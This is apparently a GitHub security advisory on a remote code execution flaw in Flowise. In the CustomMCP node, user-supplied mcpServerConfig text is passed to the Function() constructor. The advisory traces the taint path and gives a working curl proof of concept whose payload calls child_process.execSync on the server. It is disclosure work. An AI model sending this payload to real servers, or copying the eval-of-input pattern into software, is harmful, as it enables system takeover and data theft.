GHSA-3gcm-f6qx-ff7p

## Description

### Cause of the Vulnerability

The `CustomMCP` node allows users to input configuration settings for connecting to an external MCP (Model Context Protocol) server. This node parses the user-provided `mcpServerConfig` string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation.

Specifically, inside the `convertToValidJSONString` function, user input is directly passed to the `Function()` constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as `child_process` and `fs`.

### Vulnerability Flow

1. **User Input Received**: Input is provided via the API endpoint `/api/v1/node-load-method/customMCP` through the `mcpServerConfig` parameter. 2. **Variable Substitution**: The `substituteVariablesInString` function replaces template variables like `$vars.xxx`, but no security filtering is applied during this step. 3. **Dangerous Code Execution**: The `convertToValidJSONString` function executes the input using `Function('return ' + inputString)()`. If the `inputString` contains malicious code, it gets executed in the global Node.js context, allowing actions such as command execution and file system access.

## Taint Flow

- **Taint 01: Route Registration** [`index.ts` (Line 5)](https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5)

- **Taint 02: Controller** [`index.ts` (Line 57–78)](https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78)

- **Taint 03: Service** [`index.ts` (Line 91–94)](https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94)

- **Taint 04: CustomMCP Node Entry Point** [`CustomMCP.ts` (Line 132)](https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132)

- **Taint 05: Variable Substitution** [`CustomMCP.ts` (Line 220)](https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220)

- **Taint 06: Dangerous Constructor Execution** [`CustomMCP.ts` (Line 262–270)](https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270)

## Proof of Concept (PoC)

```bash curl -X POST http://localhost:3000/api/v1/node-load-method/customMCP \ -H "Content-Type: application/json" \ -H "Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q" \ -d '{ "loadMethod": "listActions", "inputs": { "mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"echo !!RCE-OK!! >/tmp/RCE.txt\");return 1;})()})" } }' ``` <img width="1907" height="958" alt="image" src="https://github.com/user-attachments/assets/78b50eb1-67af-4c8b-97ea-7e2c05426962" />

When executed, this creates a file `/tmp/RCE.txt` on the server, confirming command execution.

## Impact

### Complete System Takeover and Infrastructure Threat

This vulnerability allows attackers to execute arbitrary JavaScript code on the Flowise server, leading to:

- Full system compromise - File system access - Command execution - Sensitive data exfiltration

As only an API token is required, this poses an extreme security risk to business continuity and customer data.